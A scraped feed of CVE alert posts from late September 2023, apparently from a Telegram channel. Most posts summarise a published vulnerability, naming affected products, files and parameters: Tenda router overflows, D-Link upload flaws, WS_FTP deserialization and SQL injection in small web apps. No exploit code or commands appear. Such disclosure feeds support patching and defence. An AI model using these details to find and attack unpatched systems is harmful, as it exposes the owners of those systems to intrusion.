🚨 CVE-2023-44023Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.🎖@cveNotify |
|
| 2023-09-27 21:07:31 |
🚨 CVE-2023-30959In Apollo change requests, comments added by users could contain a javascript URI link that when rendered will result in an XSS that require user interaction.🎖@cveNotify |
|
| 2023-09-27 21:07:30 |
🚨 CVE-2023-44014Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain multiple stack overflows in the formSetMacFilterCfg function via the macFilterType and deviceList parameters.🎖@cveNotify |
|
| 2023-09-27 21:07:26 |
🚨 CVE-2023-44019Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain a stack overflow via the mac parameter in the GetParentControlInfo function.🎖@cveNotify |
|
| 2023-09-27 21:07:25 |
🚨 CVE-2023-44017Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain a stack overflow via the timeZone parameter in the fromSetSysTime function.🎖@cveNotify |
|
| 2023-09-27 21:07:24 |
🚨 CVE-2023-44015Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain a stack overflow via the schedEndTime parameter in the setSchedWifi function.🎖@cveNotify |
|
| 2023-09-27 21:07:23 |
🚨 CVE-2023-44013Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain a stack overflow via the list parameter in the fromSetIpMacBind function.🎖@cveNotify |
|
| 2023-09-27 21:07:22 |
🚨 CVE-2023-44018Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain a stack overflow via the domain parameter in the add_white_node function.🎖@cveNotify |
|
| 2023-09-27 19:07:32 |
🚨 CVE-2023-44170SeaCMS V12.9 was discovered to contain an arbitrary file write vulnerability via the component admin_ping.php.🎖@cveNotify |
|
| 2023-09-27 19:07:31 |
🚨 CVE-2023-43222SeaCMS v12.8 has an arbitrary code writing vulnerability in the /jxz7g2/admin_ping.php file.🎖@cveNotify |
|
| 2023-09-27 19:07:30 |
🚨 CVE-2023-43216SeaCMS V12.9 was discovered to contain an arbitrary file write vulnerability via the component admin_ip.php.🎖@cveNotify |
|
| 2023-09-27 19:07:27 |
🚨 CVE-2023-32458Dell AppSync, versions 4.4.0.0 to 4.6.0.0 including Service Pack releases, contains an improper access control vulnerability in Embedded Service Enabler component. A local malicious user could potentially exploit this vulnerability during installation leading to a privilege escalation.🎖@cveNotify |
|
| 2023-09-27 19:07:26 |
🚨 CVE-2023-4129Dell Data Protection Central, version 19.9, contains an Inadequate Encryption Strength Vulnerability. An unauthenticated network attacker could potentially exploit this vulnerability, allowing an attacker to recover plaintext from a block of ciphertext.🎖@cveNotify |
|
| 2023-09-27 19:07:25 |
🚨 CVE-2023-40049In WS_FTP Server version prior to 8.8.2, an unauthenticated user could enumerate files under the 'WebServiceHost' directory listing.🎖@cveNotify |
|
| 2023-09-27 19:07:22 |
🚨 CVE-2023-40048In WS_FTP Server version prior to 8.8.2, the WS_FTP Server Manager interface was missing cross-site request forgery (CSRF) protection on a POST transaction corresponding to a WS_FTP Server administrative function.🎖@cveNotify |
|
| 2023-09-27 19:07:21 |
🚨 CVE-2023-40044In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system. 🎖@cveNotify |
|
| 2023-09-27 19:07:20 |
🚨 CVE-2023-40046In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a SQL injection vulnerability exists in the WS_FTP Server manager interface. An attacker may be able to infer information about the structure and contents of the database and execute SQL statements that alter or delete database elements.🎖@cveNotify |
|
| 2023-09-27 19:07:16 |
🚨 CVE-2018-17700This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit PhantomPDF 9.2.0.9297. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Array.prototype.concat. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-7131.🎖@cveNotify |
|
| 2023-09-27 19:07:15 |
🚨 CVE-2021-25786An issue was discovered in QPDF version 10.0.4, allows remote attackers to execute arbitrary code via crafted .pdf file to Pl_ASCII85Decoder::write parameter in libqpdf.🎖@cveNotify |
|
| 2023-09-26 23:07:22 |
🚨 CVE-2023-4259Two potential buffer overflow vulnerabilities at the following locations in the Zephyr eS-WiFi driver source code.🎖@cveNotify |
|
| 2023-09-26 23:07:20 |
🚨 CVE-2023-5142A vulnerability classified as problematic was found in H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 up to 20230908. This vulnerability affects unknown code of the file /userLogin.asp of the component Config File Handler. The manipulation leads to path traversal. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-240238 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-09-26 23:07:19 |
🚨 CVE-2022-4318A vulnerability was found in cri-o. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.🎖@cveNotify |
|
| 2023-09-26 23:07:18 |
🚨 CVE-2023-5145** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000 up to 20151231 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240241 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2023-09-26 23:07:17 |
🚨 CVE-2023-5144** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /sysmanage/updateos.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240240. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2023-09-26 23:07:16 |
🚨 CVE-2015-8856Cross-site scripting (XSS) vulnerability in the serve-index package before 1.6.3 for Node.js allows remote attackers to inject arbitrary web script or HTML via a crafted file or directory name.🎖@cveNotify |
|
| 2023-09-26 23:07:15 |
🚨 CVE-2020-6205SAP NetWeaver AS ABAP Business Server Pages (Smart Forms), SAP_BASIS versions- 7.00, 7.01, 7.02, 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, 7.51, 7.52, 7.53, 7.54; does not sufficiently encode user controlled inputs, allowing an unauthenticated attacker to non-permanently deface or modify displayed content and/or steal authentication information of the user and/or impersonate the user and access all information with the same rights as the target user, leading to Reflected Cross Site Scripting Vulnerability.🎖@cveNotify |
|
| 2023-09-26 23:07:13 |
🚨 CVE-2013-3061The ISHMED-PATRED_TRANSACT_RFCCALL function in the IS-H Industry-Specific Component Hospital subsystem in SAP Healthcare Industry Solution, and the SAP ERP central component (aka ECC 6), allows remote authenticated users to bypass intended transaction restrictions via unspecified vectors.🎖@cveNotify |
|
| 2023-09-26 21:07:26 |
🚨 CVE-2021-33642When a file is processed, an infinite loop occurs in next_inline() of the more_curly() function.🎖@cveNotify |
|
| 2023-09-26 21:07:20 |
🚨 CVE-2023-26916libyang from v2.0.164 to v2.1.30 was discovered to contain a NULL pointer dereference via the function lys_parse_mem at lys_parse_mem.c.🎖@cveNotify |
|
| 2023-09-26 21:07:19 |
🚨 CVE-2023-39640UpLight cookiebanner before 1.5.1 was discovered to contain a SQL injection vulnerability via the component Hook::getHookModuleExecList().🎖@cveNotify |
|
| 2023-09-26 21:07:18 |
🚨 CVE-2023-43131General Device Manager 2.5.2.2 is vulnerable to Buffer Overflow.🎖@cveNotify |
|
| 2023-09-26 21:07:14 |
🚨 CVE-2022-48605Input verification vulnerability in the fingerprint module. Successful exploitation of this vulnerability will affect confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-09-26 21:07:13 |
🚨 CVE-2023-5143** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000 up to 20151231. This issue affects some unknown processing of the file /log/webmailattach.php. The manipulation of the argument table_name leads to an unknown weakness. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240239. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2023-09-26 18:37:31 |
🚨 CVE-2023-1636A vulnerability was found in OpenStack Barbican containers. This vulnerability is only applicable to deployments that utilize an all-in-one configuration. Barbican containers share the same CGROUP, USER, and NET namespace with the host system and other OpenStack services. If any service is compromised, it could gain access to the data transmitted to and from Barbican.🎖@cveNotify |
|
| 2023-09-26 18:37:26 |
🚨 CVE-2023-1633A credentials leak flaw was found in OpenStack Barbican. This flaw allows a local authenticated attacker to read the configuration file, gaining access to sensitive credentials.🎖@cveNotify |
|
| 2023-09-26 18:37:25 |
🚨 CVE-2023-4258In Bluetooth mesh implementation If provisionee has a public key that is sent OOB then during provisioning it can be sent back and will be accepted by provisionee.🎖@cveNotify |
|
| 2023-09-26 18:37:24 |
🚨 CVE-2023-43457An issue in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/ endpoint.🎖@cveNotify |
|
| 2023-09-26 18:37:21 |
🚨 CVE-2023-43141TOTOLINK A3700R V9.1.2u.6134_B20201202 and N600R V5.3c.5137 are vulnerable to Incorrect Access Control.🎖@cveNotify |
|
| 2023-09-26 18:37:20 |
🚨 CVE-2023-3550Mediawiki v1.40.0 does not validate namespaces used in XML files.Therefore, if the instance administrator allows XML file uploads,a remote attacker with a low-privileged user account can use thisexploit to become an administrator by sending a malicious link tothe instance administrator.🎖@cveNotify |
|
| 2023-09-26 18:37:19 |
🚨 CVE-2023-39453A use-after-free vulnerability exists in the tif_parse_sub_IFD functionality of Accusoft ImageGear 20.1. A specially crafted malformed file can lead to arbitrary code execution. An attacker can deliver file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-26 18:37:15 |
🚨 CVE-2023-3547The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly check nonce values in several actions, allowing an attacker to perform CSRF attacks.🎖@cveNotify |
|
| 2023-09-26 18:37:14 |
🚨 CVE-2023-34319The fix for XSA-423 added logic to Linux'es netback driver to deal witha frontend splitting a packet in a way such that not all of the headerswould come in one piece. Unfortunately the logic introduced theredidn't account for the extreme case of the entire packet being splitinto as many pieces as permitted by the protocol, yet still beingsmaller than the area that's specially dealt with to keep all (possible)headers together. Such an unusual packet would therefore trigger abuffer overrun in the driver.🎖@cveNotify |
|
| 2023-09-26 15:37:20 |
🚨 CVE-2023-43457An issue in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/ endpoint.🎖@cveNotify |
|
| 2023-09-26 15:37:19 |
🚨 CVE-2023-5129With a specially crafted WebP lossless file, libwebp may write data out of bounds to the heap.The ReadHuffmanCodes() function allocates the HuffmanCode buffer with a size that comes from an array of precomputed sizes: kTableSize. The color_cache_bits value defines which size to use.The kTableSize array only takes into account sizes for 8-bit first-level table lookups but not second-level table lookups. libwebp allows codes that are up to 15-bit (MAX_ALLOWED_CODE_LENGTH). When BuildHuffmanTable() attempts to fill the second-level tables it may write data out-of-bounds. The OOB write to the undersized array happens in ReplicateValue.🎖@cveNotify |
|
| 2023-09-26 15:37:18 |
🚨 CVE-2023-39640UpLight cookiebanner before 1.5.1 was discovered to contain a SQL injection vulnerability via the component Hook::getHookModuleExecList().🎖@cveNotify |
|
| 2023-09-26 15:37:17 |
🚨 CVE-2023-40581yt-dlp is a youtube-dl fork with additional features and fixes. yt-dlp allows the user to provide shell command lines to be executed at various stages in its download steps through the `--exec` flag. This flag allows output template expansion in its argument, so that metadata values may be used in the shell commands. The metadata fields can be combined with the `%q` conversion, which is intended to quote/escape these values so they can be safely passed to the shell. However, the escaping used for `cmd` (the shell used by Python's `subprocess` on Windows) does not properly escape special characters, which can allow for remote code execution if `--exec` is used directly with maliciously crafted remote data. This vulnerability only impacts `yt-dlp` on Windows, and the vulnerability is present regardless of whether `yt-dlp` is run from `cmd` or from `PowerShell`. Support for output template expansion in `--exec`, along with this vulnerable behavior, was added to `yt-dlp` in version 2021.04.11. yt-dlp version 2023.09.24 fixes this issue by properly escaping each special character. `\n` will be replaced by `\r` as no way of escaping it has been found. It is recommended to upgrade yt-dlp to version 2023.09.24 as soon as possible. Also, always be careful when using --exec, because while this specific vulnerability has been patched, using unvalidated input in shell commands is inherently dangerous. For Windows users who are not able to upgrade: 1. Avoid using any output template expansion in --exec other than {} (filepath). 2. If expansion in --exec is needed, verify the fields you are using do not contain ", | or &. 3. Instead of using --exec, write the info json and load the fields from it instead.🎖@cveNotify |
|
| 2023-09-26 15:37:16 |
🚨 CVE-2023-42817Pimcore admin-ui-classic-bundle provides a Backend UI for Pimcore. The translation value with text including “%s” (from “%suggest%) is parsed by sprintf() even though it’s supposed to be output literally to the user. The translations may be accessible by a user with comparatively lower overall access (as the translation permission cannot be scoped to certain “modules”) and a skilled attacker might be able to exploit the parsing of the translation string in the dialog box. This issue has been patched in commit `abd77392` which is included in release 1.1.2. Users are advised to update to version 1.1.2 or apply the patch manually.🎖@cveNotify |
|
| 2023-09-26 15:37:15 |
🚨 CVE-2023-43319Cross Site Scripting (XSS) vulnerability in the Sign-In page of IceWarp WebClient 10.3.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter.🎖@cveNotify |
|
| 2023-09-26 02:43:48 |
CVE Notify pinned «» |
|
| 2023-09-26 02:43:45 |
None |
|
| 2023-09-26 01:07:24 |
🚨 CVE-2023-38907An issue in TPLink Smart bulb Tapo series L530 v.1.0.0 and Tapo Application v.2.8.14 allows a remote attacker to obtain sensitive information via session key in the message function.🎖@cveNotify |
|
| 2023-09-26 01:07:23 |
🚨 CVE-2023-42464A Type Confusion vulnerability was found in the Spotlight RPC functions in afpd in Netatalk 3.1.x before 3.1.17. When parsing Spotlight RPC packets, one encoded data structure is a key-value style dictionary where the keys are character strings, and the values can be any of the supported types in the underlying protocol. Due to a lack of type checking in callers of the dalloc_value_for_key() function, which returns the object associated with a key, a malicious actor may be able to fully control the value of the pointer and theoretically achieve Remote Code Execution on the host. This issue is similar to CVE-2023-34967.🎖@cveNotify |
|
| 2023-09-26 01:07:22 |
🚨 CVE-2023-43326mooSocial v3.1.8 was discovered to contain a cross-site scripting (XSS) vulnerability via the change email function.🎖@cveNotify |
|
| 2023-09-26 01:07:18 |
🚨 CVE-2023-38354MiniTool Shadow Maker version 4.1 contains an insecure installation process that allows attackers to achieve remote code execution through a man in the middle attack.🎖@cveNotify |
|
| 2023-09-26 01:07:17 |
🚨 CVE-2021-45462In Open5GS 2.4.0, a crafted packet from UE can crash SGW-U/UPF.🎖@cveNotify |
|
| 2023-09-26 01:07:16 |
🚨 CVE-2018-12207Improper invalidation for page table updates by a virtual guest operating system for multiple Intel(R) Processors may allow an authenticated user to potentially enable denial of service of the host system via local access.🎖@cveNotify |
|
| 2023-09-25 18:37:36 |
🚨 CVE-2023-41298Vulnerability of permission control in the window module. Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-09-25 18:37:35 |
🚨 CVE-2023-39409DoS vulnerability in the PMS module. Successful exploitation of this vulnerability may cause the system to restart.🎖@cveNotify |
|
| 2023-09-25 18:37:34 |
🚨 CVE-2023-41302Redirection permission verification vulnerability in the home screen module. Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2023-09-25 18:37:33 |
🚨 CVE-2022-40433An issue was discovered in function ciMethodBlocks::make_block_at in Oracle JDK (HotSpot VM) 11, 17 and OpenJDK (HotSpot VM) 8, 11, 17, allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2023-09-25 18:37:29 |
🚨 CVE-2023-39408DoS vulnerability in the PMS module. Successful exploitation of this vulnerability may cause the system to restart.🎖@cveNotify |
|
| 2023-09-25 18:37:28 |
🚨 CVE-2023-39407The Watchkit has a risk of unauthorized file access.Successful exploitation of this vulnerability may affect confidentiality and integrity.🎖@cveNotify |
|
| 2023-09-25 18:37:27 |
🚨 CVE-2023-41301Vulnerability of unauthorized API access in the PMS module. Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2023-09-25 18:37:26 |
🚨 CVE-2023-41300Vulnerability of parameters not being strictly verified in the PMS module. Successful exploitation of this vulnerability may cause the system to restart.🎖@cveNotify |
|
| 2023-09-25 18:37:23 |
🚨 CVE-2023-41293Data security classification vulnerability in the DDMP module. Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-09-25 18:37:22 |
🚨 CVE-2023-38343An XXE (XML external entity injection) vulnerability exists in the CSEP component of Ivanti Endpoint Manager before 2022 SU4. External entity references are enabled in the XML parser configuration. Exploitation of this vulnerability can lead to file disclosure or Server Side Request Forgery.🎖@cveNotify |
|
| 2023-09-25 18:37:21 |
🚨 CVE-2023-42280mee-admin 1.5 is vulnerable to Directory Traversal. The download method in the CommonFileController.java file does not verify the incoming data, resulting in arbitrary file reading.🎖@cveNotify |
|
| 2023-09-25 18:37:20 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in iOS 16.7 and iPadOS 16.7, iOS 17.0.1 and iPadOS 17.0.1, Safari 16.6.1. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-09-25 18:37:16 |
🚨 CVE-2023-36159Cross Site Scripting (XSS) vulnerability in sourcecodester Lost and Found Information System 1.0 allows remote attackers to run arbitrary code via the First Name, Middle Name and Last Name fields on the Create User page.🎖@cveNotify |
|
| 2023-09-25 18:37:15 |
🚨 CVE-2023-3850A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_category of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-235201 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-25 18:37:14 |
🚨 CVE-2023-3679A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=save_inquiry of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-234224.🎖@cveNotify |
|
| 2023-09-25 18:37:13 |
🚨 CVE-2023-3680A vulnerability classified as critical has been found in SourceCodester Lost and Found Information System 1.0. This affects an unknown part of the file /classes/Master.php?f=save_item of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-234225 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-25 17:59:41 |
CVE Notify pinned «» |
|
| 2023-09-25 17:59:37 |
None |
|
| 2023-09-25 17:37:27 |
🚨 CVE-2023-43669The Tungstenite crate before 0.20.1 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes).🎖@cveNotify |
|
| 2023-09-25 17:37:26 |
🚨 CVE-2023-43456Cross Site Scripting vulnerability in Service Provider Management System v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the firstname, middlename and lastname parameters in the /php-spms/admin/?page=user endpoint.🎖@cveNotify |
|
| 2023-09-25 17:37:25 |
🚨 CVE-2011-0766The random number generator in the Crypto application before 2.0.2.2, and SSH before 2.0.5, as used in the Erlang/OTP ssh library before R14B03, uses predictable seeds based on the current time, which makes it easier for remote attackers to guess DSA host and SSH session keys.🎖@cveNotify |
|
| 2023-09-25 17:37:24 |
🚨 CVE-2023-43131General Device Manager 2.5.2.2 is vulnerable to Buffer Overflow.🎖@cveNotify |
|
| 2023-09-25 17:37:22 |
🚨 CVE-2023-42450Mastodon is a free, open-source social network server based on ActivityPub. Starting in version 4.2.0-beta1 and prior to version 4.2.0-rc2, by crafting specific input, attackers can inject arbitrary data into HTTP requests issued by Mastodon. This can be used to perform confused deputy attacks if the server configuration includes `ALLOWED_PRIVATE_ADDRESSES` to allow access to local exploitable services. Version 4.2.0-rc2 has a patch for the issue.🎖@cveNotify |
|
| 2023-09-25 17:37:21 |
🚨 CVE-2020-21710A divide by zero issue discovered in eps_print_page in gdevepsn.c in Artifex Software GhostScript 9.50 allows remote attackers to cause a denial of service via opening of crafted PDF file.🎖@cveNotify |
|
| 2023-09-25 17:37:20 |
🚨 CVE-2020-21890Buffer Overflow vulnerability in clj_media_size function in devices/gdevclj.c in Artifex Ghostscript 9.50 allows remote attackers to cause a denial of service or other unspecified impact(s) via opening of crafted PDF document.🎖@cveNotify |
|
| 2023-09-25 17:37:19 |
🚨 CVE-2023-42279Dreamer CMS 4.1.3 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-09-25 17:37:18 |
🚨 CVE-2023-43256A path traversal in Gladys Assistant v4.26.1 and below allows authenticated attackers to extract sensitive files in the host machine by exploiting a non-sanitized user input.🎖@cveNotify |
|
| 2023-09-25 17:37:16 |
🚨 CVE-2023-4916The Login with phone number plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.6. This is due to missing nonce validation on the 'lwp_update_password_action' function. This makes it possible for unauthenticated attackers to change user password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-09-25 17:37:15 |
🚨 CVE-2023-37279Faktory is a language-agnostic persistent background job server. Prior to version 1.8.0, the Faktory web dashboard can suffer from denial of service by a crafted malicious url query param `days`. The vulnerability is related to how the backend reads the `days` URL query parameter in the Faktory web dashboard. The value is used directly without any checks to create a string slice. If a very large value is provided, the backend server ends up using a significant amount of memory and causing it to crash. Version 1.8.0 fixes this issue.🎖@cveNotify |
|
| 2023-09-25 17:37:14 |
🚨 CVE-2023-40221** UNSUPPPORTED WHEN ASSIGNED ** The absence of filters when loading some sections in the web application of the vulnerable device allows potential attackers to inject malicious code that will be interpreted when a legitimate user accesses the web section (MAIL SERVER) where the information is displayed. Injection can be done on parameter MAIL_RCV. When a legitimate user attempts to review NOTIFICATION/MAIL SERVER, the injected code will be executed.🎖@cveNotify |
|
| 2023-09-25 15:07:14 |
🚨 CVE-2023-41294The DP module has a service hijacking vulnerability.Successful exploitation of this vulnerability may affect some Super Device services.🎖@cveNotify |
|
| 2023-09-25 15:07:13 |
🚨 CVE-2023-41297Vulnerability of defects introduced in the design process in the HiviewTunner module. Successful exploitation of this vulnerability may cause service hijacking.🎖@cveNotify |
|
| 2023-09-25 14:53:14 |
CVE Notify pinned «» |
|
| 2023-09-25 14:53:07 |
None |
|
| 2023-09-25 13:07:16 |
🚨 CVE-2023-39409DoS vulnerability in the PMS module. Successful exploitation of this vulnerability may cause the system to restart.🎖@cveNotify |
|
| 2023-09-25 10:37:18 |
🚨 CVE-2023-39407The Watchkit has a risk of unauthorized file access.Successful exploitation of this vulnerability may affect confidentiality and integrity.🎖@cveNotify |
|
| 2023-09-25 10:37:17 |
🚨 CVE-2015-6964MultiBit HD before 0.1.2 allows attackers to conduct bit-flipping attacks that insert unspendable Bitcoin addresses into the list that MultiBit uses to send fees to the developers. (Attackers cannot realistically steal these fees for themselves.) This occurs because there is no message authentication code (MAC).🎖@cveNotify |
|
| 2023-09-25 10:37:16 |
🚨 CVE-2002-20001The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)at or D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The attack may be more disruptive in cases where a client can require a server to select its largest supported key size. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE.🎖@cveNotify |
|
| 2023-09-25 10:37:15 |
🚨 CVE-2007-1923(1) LedgerSMB and (2) DWS Systems SQL-Ledger implement access control lists by changing the set of URLs linked from menus, which allows remote attackers to access restricted functionality via direct requests. The LedgerSMB affected versions are before 1.3.0.🎖@cveNotify |
|
| 2023-09-25 06:37:16 |
🚨 CVE-2023-5147** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been classified as critical. This affects an unknown part of the file /sysmanage/updateos.php. The manipulation of the argument 1_file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240243. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2023-09-25 06:37:15 |
🚨 CVE-2023-5148** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 and DAR-8000 up to 20151231. It has been declared as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240244. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2023-09-25 06:37:14 |
🚨 CVE-2023-5142A vulnerability classified as problematic was found in H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 up to 20230908. This vulnerability affects unknown code of the file /userLogin.asp of the component Config File Handler. The manipulation leads to path traversal. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-240238 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-09-24 22:37:17 |
🚨 CVE-2023-41081The mod_jk component of Apache Tomcat Connectors in some circumstances, such as when a configuration included "JkOptions +ForwardDirectories" but the configuration did not provide explicit mounts for all possible proxied requests, mod_jk would use an implicit mapping and map the request to the first defined worker. Such an implicit mapping could result in the unintended exposure of the status worker and/or bypass security constraints configured in httpd. As of JK 1.2.49, the implicit mapping functionality has been removed and all mappings must now be via explicit configuration. Only mod_jk is affected by this issue. The ISAPI redirector is not affected.This issue affects Apache Tomcat Connectors (mod_jk only): from 1.2.0 through 1.2.48.Users are recommended to upgrade to version 1.2.49, which fixes the issue.🎖@cveNotify |
|
| 2023-09-24 13:03:28 |
None |
|
| 2023-09-24 06:07:19 |
🚨 CVE-2023-1260An authentication bypass vulnerability was discovered in kube-apiserver. This issue could allow a remote, authenticated attacker who has been given permissions "update, patch" the "pods/ephemeralcontainers" subresource beyond what the default is. They would then need to create a new pod or patch one that they already have access to. This might allow evasion of SCC admission restrictions, thereby gaining control of a privileged pod.🎖@cveNotify |
|
| 2023-09-24 06:07:18 |
🚨 CVE-2023-1625An information leak was discovered in OpenStack heat. This issue could allow a remote, authenticated attacker to use the 'stack show' command to reveal parameters which are supposed to remain hidden. This has a low impact to the confidentiality, integrity, and availability of the system.🎖@cveNotify |
|
| 2023-09-24 06:07:17 |
🚨 CVE-2023-1636A vulnerability was found in OpenStack Barbican containers. This vulnerability is only applicable to deployments that utilize an all-in-one configuration. Barbican containers share the same CGROUP, USER, and NET namespace with the host system and other OpenStack services. If any service is compromised, it could gain access to the data transmitted to and from Barbican.🎖@cveNotify |
|
| 2023-09-24 05:47:54 |
CVE Notify pinned «» |
|
| 2023-09-24 05:47:49 |
None |
|
| 2023-09-23 23:07:19 |
🚨 CVE-2022-3962A content spoofing vulnerability was found in Kiali. It was discovered that Kiali does not implement error handling when the page or endpoint being accessed cannot be found. This issue allows an attacker to perform arbitrary text injection when an error response is retrieved from the URL being accessed.🎖@cveNotify |
|
| 2023-09-23 23:07:18 |
🚨 CVE-2020-21047The libcpu component which is used by libasm of elfutils version 0.177 (git 47780c9e), suffers from denial-of-service vulnerability caused by application crashes due to out-of-bounds write (CWE-787), off-by-one error (CWE-193) and reachable assertion (CWE-617); to exploit the vulnerability, the attackers need to craft certain ELF files which bypass the missing bound checks.🎖@cveNotify |
|
| 2023-09-23 21:07:18 |
🚨 CVE-2023-43669The Tungstenite crate before 0.20.1 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes).🎖@cveNotify |
|
| 2023-09-23 18:37:19 |
